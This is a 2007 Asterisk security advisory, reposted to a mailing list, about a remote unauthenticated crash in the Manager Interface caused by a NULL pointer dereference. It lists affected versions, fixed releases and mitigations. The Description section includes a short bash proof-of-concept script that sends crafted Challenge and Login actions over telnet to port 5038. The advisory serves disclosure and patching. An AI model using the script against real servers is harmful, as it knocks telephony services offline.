<<< Date Index >>>     <<< Thread Index >>>

ASA-2007-012: Remote Crash Vulnerability in Manager Interface



>                Asterisk Project Security Advisory - ASA-2007-012
> 
>    +------------------------------------------------------------------------+
>    |       Product       | Asterisk                                         |
>    |---------------------+--------------------------------------------------|
>    |       Summary       | Remote Crash Vulnerability in Manager Interface  |
>    |---------------------+--------------------------------------------------|
>    | Nature of Advisory  | Denial of Service                                |
>    |---------------------+--------------------------------------------------|
>    |   Susceptibility    | Remote Unauthenticated Sessions                  |
>    |---------------------+--------------------------------------------------|
>    |      Severity       | Moderate                                         |
>    |---------------------+--------------------------------------------------|
>    |   Exploits Known    | Yes                                              |
>    |---------------------+--------------------------------------------------|
>    |     Reported On     | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |     Reported By     | Digium Technical Support                         |
>    |---------------------+--------------------------------------------------|
>    |      Posted On      | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |   Last Updated On   | April 24, 2007                                   |
>    |---------------------+--------------------------------------------------|
>    |  Advisory Contact   | russell@xxxxxxxxxx                               |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Description | The Asterisk Manager Interface has a remote crash        |
>    |             | vulnerability. If a manager user is configured in        |
>    |             | manager.conf without a password, and then a connection   |
>    |             | is made that attempts to use that username and MD5       |
>    |             | authentication, Asterisk will dereference a NULL pointer |
>    |             | and crash.                                               |
>    |             |                                                          |
>    |             | This example script shows how the crash can be           |
>    |             | triggered:                                               |
>    |             |                                                          |
>    |             | #!/bin/bash                                              |
>    |             |                                                          |
>    |             | function text1() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Challenge                                        |
>    |             |                                                          |
>    |             | actionid: 0#                                             |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | function text2() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Login                                            |
>    |             |                                                          |
>    |             | actionid: 1#                                             |
>    |             |                                                          |
>    |             | key: textstringhere                                      |
>    |             |                                                          |
>    |             | username: testuser                                       |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1     |
>    |             | 5038                                                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | The manager interface is not enabled by default. If it is |
>    |            | enabled, the only way this crash can be exploited is if a |
>    |            | user exists in manager.conf without a password. Given the |
>    |            | conditions necessary for this problem to be exploited,    |
>    |            | the severity of this issue is marked as 'moderate'.       |
>    |            |                                                           |
>    |            | All users of the Asterisk manager interface in affected   |
>    |            | versions should ensure that there are no accounts in      |
>    |            | manager.conf. Alternatively, the issue can be avoided by  |
>    |            | completely disabling the manager interface.               |
>    |            |                                                           |
>    |            | Users of the manager interface are encouraged to update   |
>    |            | to the appropriate version of their Asterisk product      |
>    |            | listed in the 'Corrected In' section below.               |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | All versions              |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | All versions prior to     |
>    |                              |             | 1.2.18                    |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | All versions prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | All versions              |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | All versions up to and    |
>    |                              |             | including B.1.3           |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | All version up to and     |
>    |                              |             | including Beta5           |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | All versions prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product      |                      Release                       |
>    |-------------------+----------------------------------------------------|
>    |   Asterisk Open   |          1.2.18 and 1.4.3, available from          |
>    |      Source       |    ftp://ftp.digium.com/pub/telephony/asterisk     |
>    |-------------------+----------------------------------------------------|
>    | Asterisk Business |   B.1.3.3, available from the Asterisk Business    |
>    |      Edition      |  Edition user portal on http://www.digium.com or   |
>    |                   |            via Digium Technical Support            |
>    |-------------------+----------------------------------------------------|
>    |    AsteriskNOW    |             Beta6, when available from             |
>    |                   |   http://www.asterisknow.org/. Beta5 can use the   |
>    |                   |   system update feature in the appliance control   |
>    |                   |                       panel.                       |
>    |-------------------+----------------------------------------------------|
>    |     Asterisk      |               0.4.0, available from                |
>    |     Appliance     |      ftp://ftp.digium.com/pub/telephony/aadk/      |
>    |   Developer Kit   |                                                    |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links        |                                                  |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-012.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-012
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.